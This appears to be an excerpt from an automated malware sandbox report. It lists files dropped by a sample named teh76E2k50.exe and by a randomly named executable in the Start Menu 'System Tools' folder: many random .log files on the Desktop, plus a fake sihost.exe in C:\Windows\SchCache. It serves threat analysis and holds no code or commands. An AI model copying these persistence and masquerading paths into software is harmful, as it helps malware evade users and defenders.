                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BSjUAQPo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JRYtVobT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NEXrZULz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WUhawSrf.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YbtaoKyW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BVbCJhtL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\shEGUPEJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BGEGNIeN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LfVByPYY.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\KFIMcleA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\cKWbBtXG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\XfGAYNcS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TvubsmQz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\XRIjRSGa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\adhyQtRa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eTWARqDK.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VtGsqNSz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TJILxrgf.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fpYOnkHi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BmiVXCnN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vNbglcZZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SiSqReIq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\wWhDskZv.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\kxbWRuhA.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\sMBlRSok.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\ofivtIHo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ByUnjZDH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\RlvripyF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BQYWEsJr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\qmowuovM.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\iWdYRpBW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\TArJFQhB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kPsHDmnV.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Windows\SchCache\sihost.exeJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\gtCFacYK.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\WKjpqzTc.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\MbPZGXOu.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\DswJWuJN.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\dHXpSOOR.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\BMbUPQnU.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\CJDckQCP.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\kxbWRuhA.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\bOHGhRcS.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\SlzRxYMl.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\SEWrteSu.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\PUeIrTzt.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\GrWSIakL.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\oeuNoEPw.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\MjzskGoA.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\DAfcAdjS.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\sMBlRSok.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\bFkGxfJW.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\xATktOEY.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\hyNgaLOK.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\HxVaNNSD.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\ofivtIHo.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\DBTJGhcJ.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\luCemuwv.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\LESjjfMz.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\AQotzTRR.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\kGyWBgAx.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeFile created: C:\Users\user\Desktop\SmnyDbFc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ulxeAMJt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\wnjMVvNo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\udNLVcin.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\lzFWljSG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\UsorSwnr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SiSqReIq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\IzyaiCCJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\qnXVOghu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\OsbzKhHx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\GOTKaosQ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FJIjaFCP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\wfzurMmi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nxgeHjhA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eTYoXqRT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\UkEZnNMm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CYcTTrrX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\spJDjPmp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jGqnAmhH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\adhyQtRa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZYWXQKba.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\IQFswXwL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\yimcMvrd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YsCiJgGh.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NEXrZULz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DVEbprGR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vrvmFyrk.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ekfHlLLW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\baJGltgV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\mdpOgNja.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\naQWCNyV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VOpRirdG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LfVByPYY.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CwClOmSr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kplGuznc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SdJAbeSN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\zLWUHZHy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hzuPnDnj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fpYOnkHi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\WLQZDrsB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NhIjUycT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\EzoTkVXm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\vVgeAcHF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\njoWmzRS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\kqZnADfT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JvdSwEFX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\roNndSaI.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jKExtYKb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\hAixtGfa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\QtRSZTAM.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FFnbpIFd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\fUOHmcKi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NImBSGpT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CUHLiuul.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\tlovySpD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\aZMqfwUo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\SvEAvCEH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\KGTKXJkx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\dQWYMfTH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\UmOidmEa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LEvStJys.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BVbCJhtL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\trTNZned.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jIzxpLYw.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZaghFjTO.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ITPCmwoz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ApHNCCYS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\gXUhixOD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\YuMryEyW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\OLsbOcto.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\NGhBOsDn.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\DXOleQyG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\mQxGLdSr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ccSQbSYJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\JQrKHwDu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\BmiVXCnN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\sJafoJXg.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jaGPEhSy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\QNeKkLxj.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FUptAQNB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nNYOgdhm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eeFyxBcE.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\VBwJNHMX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\LNSSdwSp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CjKdtCCI.logJump to dropped file
